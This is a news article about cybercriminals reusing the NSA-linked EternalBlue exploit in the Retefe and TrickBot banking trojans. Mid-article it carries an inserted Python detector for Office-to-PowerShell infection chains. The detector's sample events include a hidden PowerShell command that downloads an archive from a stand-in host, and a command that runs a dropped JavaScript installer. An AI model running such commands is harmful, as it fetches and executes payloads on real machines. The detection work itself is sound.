Sputnik International

WannaCry Some More? Cybercriminals Using NSA Hacking Tools to Attack Citizens

Photo: Ransomware attacks global IT systems (© Sputnik / Vladimir Trefilov)
A cybersecurity firm has announced hacking tools linked to the US National Security Agency are being exploited by cybercriminals.

NSA-linked hacking tools are being used by cybercriminals in efforts to remotely steal money and confidential information from online banking users, according to research conducted by cybersecurity firm Proofpoint.

Proofpoint researchers discovered two different banking trojans in the wild, with computer code taken from a now-publicly available exploit known as "EternalBlue" (CVE-2017-0144).

EternalBlue is used by the NSA to gather intelligence, and targets a vulnerability in Microsoft's Server Message Block protocol, which affects outdated versions of several different Microsoft operating systems. It allows hackers to quickly compromise multiple computers on a shared network, as long as they are all running similarly dated software.

Patching Windows can take a very long time for large organizations — often, exploits that are several years old can still be used successfully in attacks. Evidently, as long as threat actors continue to find widespread, unpatched vulnerabilities, they will continue to leverage exploits such as EternalBlue.

Trojan Duo

The two Trojans — Retefe and TrickBot — are relatively common, and have been in use for several months as part of various email phishing campaigns targeted at companies and individual users. The latest versions of these trojans carry elements of EternalBlue.

The new variant of Retefe identified by Proofpoint was sent in an unsolicited email to a company, containing a malicious Microsoft Office document laden with embedded Package Shell Objects. When opened, a PowerShell command downloads a .zip archive holding an obfuscated JavaScript installer, hosted on a remote server. The end result is the installation of a virus that leverages EternalBlue to quickly spread inside an infected network.
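The chain just described (Office document, then a PowerShell download of a .zip, then a JavaScript installer) leaves a recognisable parent/child trail in process-creation telemetry, which is where a defender would look for it. The following Python is an added example, not code from Proofpoint or from this article: it flags that lineage in a handful of sample process-creation events modelled on Sysmon Event ID 1 fields. The file paths, command lines and the `payload.example` host are constructed for the example, and the later EternalBlue spread across the network is out of scope here.

```python
"""Flag the Office -> PowerShell -> archive/JS installer chain in process-creation events.

Events are modelled on Sysmon Event ID 1 (parent image, image, command line).
All sample events at the bottom are constructed for this example.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# PowerShell acting as a downloader.
DOWNLOAD_RE = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|net\.webclient"
    r"|start-bitstransfer|https?://", re.I)
# Archive or script payload named on the command line.
PAYLOAD_RE = re.compile(r"\.(zip|js|jse|vbs)\b", re.I)
# Common options used to hide or unconstrain the PowerShell run.
EVASION_RE = re.compile(r"-enc(odedcommand)?\b|-nop\b|-w(indowstyle)?\s+hidden|bypass", re.I)


@dataclass(frozen=True)
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


def _name(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def analyse(ev: ProcessEvent) -> list[str]:
    """Return the reasons an event matches the chain; empty list means not flagged."""
    parent, child, cmd = _name(ev.parent_image), _name(ev.image), ev.command_line
    reasons: list[str] = []
    if parent in OFFICE_APPS and child in SCRIPT_HOSTS:
        reasons.append(f"office app {parent} spawned script host {child}")
    elif parent in SCRIPT_HOSTS and child in SCRIPT_HOSTS and PAYLOAD_RE.search(cmd):
        # Second stage: PowerShell handing a dropped .js/.vbs to wscript/cscript.
        reasons.append(f"script host {parent} launched {child} on a script payload")
    if not reasons:
        return []  # No suspicious lineage: command-line keywords alone are too noisy.
    if DOWNLOAD_RE.search(cmd):
        reasons.append("command line downloads content")
    if PAYLOAD_RE.search(cmd):
        reasons.append("command line references an archive or script file")
    if EVASION_RE.search(cmd):
        reasons.append("command line uses hidden/encoded/bypass options")
    return reasons


def is_suspicious(ev: ProcessEvent) -> bool:
    return bool(analyse(ev))


def triage(events: list[ProcessEvent]) -> list[tuple[int, list[str]]]:
    """(index, reasons) for every flagged event, most reasons first."""
    hits = [(i, analyse(ev)) for i, ev in enumerate(events)]
    return sorted([h for h in hits if h[1]], key=lambda h: -len(h[1]))


# Constructed sample events (not real telemetry). Event 0 is the document stage,
# event 3 the dropped installer stage; events 1 and 2 are benign look-alikes.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -nop -w hidden -c (New-Object Net.WebClient).DownloadFile("
                 r"'http://payload.example/inst.zip','C:\Users\bob\AppData\Local\Temp\inst.zip')"),
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -Command Get-ChildItem C:\Reports"),
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 r"C:\Windows\splwow64.exe", r"C:\Windows\splwow64.exe 12288"),
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\System32\wscript.exe",
                 r"wscript.exe C:\Users\bob\AppData\Local\Temp\inst\setup.js"),
]

if __name__ == "__main__":
    for i, reasons in triage(SAMPLE_EVENTS):
        print(f"event {i}: " + "; ".join(reasons))
```

The lineage check is the primary signal and the command-line patterns only add weight, because keyword matching on its own fires on legitimate administration, whereas Word or Excel spawning a script host is rare enough in most environments to be worth a ticket on its own.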

Retefe has been largely used in attacks against banks in Austria, Sweden, Switzerland, Japan and the United Kingdom, according to researchers. While it has never reached the scale or notoriety of better-known banking Trojans such as Dridex or Zeus, Retefe is notable for its consistent regional focus and interesting implementation, Proofpoint notes.

Nonetheless, the use of EternalBlue doesn't appear to be focused or aimed at one specific industry or region, and there is no common theme in terms of targeting for attacks leveraging EternalBlue. Attackers appear to be pursuing both disruptive and destructive ends, as with WannaCry — which was also propagated via EternalBlue.

In the past, EternalBlue exploits have been used in tandem with ransomware to extort money from businesses. It's not entirely clear who is behind Retefe or TrickBot, although a relatively small group is thought to be behind the spread of Retefe.

The EternalBlue exploit first became publicly known — and available for reuse — following the publication of a package of NSA documents by a group known as The Shadow Brokers.
